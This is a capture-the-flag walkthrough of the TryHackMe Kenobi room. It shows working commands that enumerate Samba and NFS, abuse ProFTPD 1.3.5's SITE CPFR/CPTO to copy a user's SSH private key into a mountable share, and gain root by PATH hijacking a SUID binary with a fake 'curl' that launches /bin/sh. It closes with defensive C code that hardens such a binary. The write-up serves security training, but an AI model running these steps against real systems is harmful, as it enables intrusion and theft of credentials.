Welcome to the writeup of the Kenobi room from TryHackMe - CTF.
It's another room from a famous franchise (Star Wars), but it's less themed than the Biohazard room - here is my Biohazard Walkthrough - so this will be a direct writeup.
Here we go...
"Description: This room will cover accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privileges to root via an SUID binary."
IP: 10.10.128.132
sudo nmap -v -sSV -Pn 10.10.128.132 -oN nmap/scan
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
There are some ports that we could identify with Nmap, but we will not stop here with Nmap... let's use some NSE scripts.
sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.128.132 -oN nmap/smb
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.128.132\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.128.132\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.128.132\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
With the "smb-enum" scripts, we found shares that we can try to access and explore using smbclient.
smbclient //10.10.128.132/anonymous
dir
. D 0 Wed Sep 4 03:49:09 2019
.. D 0 Wed Sep 4 03:56:07 2019
log.txt N 12237 Wed Sep 4 03:49:09 2019
get log.txt
cat log.txt --> returns an SSH key
Exploring this "configuration", we got some interesting information about an SSH key and the FTP server through the log.txt file.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.128.132
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836524.0 6877104.0 22% 16.0T 32000
With the "nfs" scripts, we could enumerate a network file system (/var is exported to everyone), and now we can try to mount it.
Through the ProFTPD version running on the server we could exploit a module that provides the "SITE CPFR" and "SITE CPTO" commands, which copy files/directories from one place to another on the server. Using the information in log.txt it was possible to determine the location of the SSH key and copy it to a directory inside the /var export that we can mount.
nc -v 10.10.128.132 21
Connection to 10.10.128.132 21 port [tcp/ftp] succeeded!
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.128.132]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
After exploring and copying the SSH key into /var/tmp, which we can reach through the NFS export, we mount the share and have direct access to the key.
mkdir /mnt/kenobiNFS
sudo mount 10.10.128.132:/var /mnt/kenobiNFS/
cd /mnt/kenobiNFS/tmp
Now we can log in to the server using the SSH key.
sudo chmod 600 id_rsa
ssh kenobi@10.10.128.132 -i id_rsa
kenobi@kenobi:~$ wc -c user.txt
33 user.txt
With access to the machine as the "kenobi" user, it was possible to find the user flag.
Checking for misconfigurations to escalate privileges, we found the binary /usr/bin/menu set SUID, which allows us to run it as root.
find / -perm -u=s -type f 2>/dev/null
But we need to know how the binary works to exploit it. So, let's run it.
It appears to call commands such as "curl" and "ifconfig" in options "1" and "3" respectively, running them without a full path (e.g. /usr/bin/curl). So we can set the PATH variable to start with a directory we control, and create a file there with the same name as the command called by /usr/bin/menu, but with different code :D
Example:
cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu
Since this binary runs as root (SUID), the command in our file ("/bin/sh" or "/bin/bash", found first through the PATH we defined) runs as root too... With that, choosing the option that calls the replaced command, we become root \o/
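As an added hardening example (not the room's /usr/bin/menu, whose source is not on this page), here is how a SUID menu helper can call the same tools without being hijackable through PATH: absolute program paths, execve with a fixed minimal environment, no shell, plus a small audit check for an inherited PATH. The menu table, the uname entry and all function names are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
/* PATH the helper gives its children; the caller's PATH is never consulted. */
#define SAFE_PATH "/usr/sbin:/usr/bin:/sbin:/bin"
/* Absolute program paths only: a bare "curl" is what the writeup hijacks via PATH. */
static const char *const MENU[][4] = {
    { "/usr/bin/curl", "-I", "localhost", NULL },   /* option 1 */
    { "/bin/uname", "-r", NULL },                   /* option 2 (assumed entry) */
    { "/sbin/ifconfig", NULL },                     /* option 3 */
};

/* Absolute program for a 1-based menu choice, or NULL if out of range. */
const char *menu_program(int choice) {
    if (choice < 1 || choice > (int)(sizeof MENU / sizeof MENU[0])) return NULL;
    return MENU[choice - 1][0];
}

/* Audit check for an inherited PATH: 1 only if every entry is one of the
 * SAFE_PATH directories, 0 for anything else ("", ".", /tmp, $HOME, ...). */
int path_is_trusted(const char *path) {
    static const char safe[] = ":" SAFE_PATH ":";
    char entry[128];
    if (!path || !*path) return 0;
    for (const char *seg = path;; seg = strchr(seg, ':') + 1) {
        const char *end = strchr(seg, ':');
        size_t len = end ? (size_t)(end - seg) : strlen(seg);
        if (len == 0 || len + 3 > sizeof entry) return 0;   /* "" means cwd */
        snprintf(entry, sizeof entry, ":%.*s:", (int)len, seg);
        if (!strstr(safe, entry)) return 0;
        if (!end) return 1;
    }
}
/* Run one menu entry via execve with a fixed, minimal environment and an
 * absolute path (no shell, no PATH search). Returns the exit status or -1. */
int run_menu_entry(int choice) {
    static char *const envp[] = { "PATH=" SAFE_PATH, NULL };
    if (!menu_program(choice)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(MENU[choice - 1][0], (char *const *)MENU[choice - 1], envp);
        _exit(127);                  /* exec failed: never fall back to a shell */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this layout, a caller's `export PATH=/tmp:$PATH` has no effect: the child never sees the caller's environment and the program is located by its absolute path.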
Now we have full control of this machine and it is possible to read the root flag at /root/root.txt.
Thanks for reading and feel free to pingback a coffee ;D
naP0